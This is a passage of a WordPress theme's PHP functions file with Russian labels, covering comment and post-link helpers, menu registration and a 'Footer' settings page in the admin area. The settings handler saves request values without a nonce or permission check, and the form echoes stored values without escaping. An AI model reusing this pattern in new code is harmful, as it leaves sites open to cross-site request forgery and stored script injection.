                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
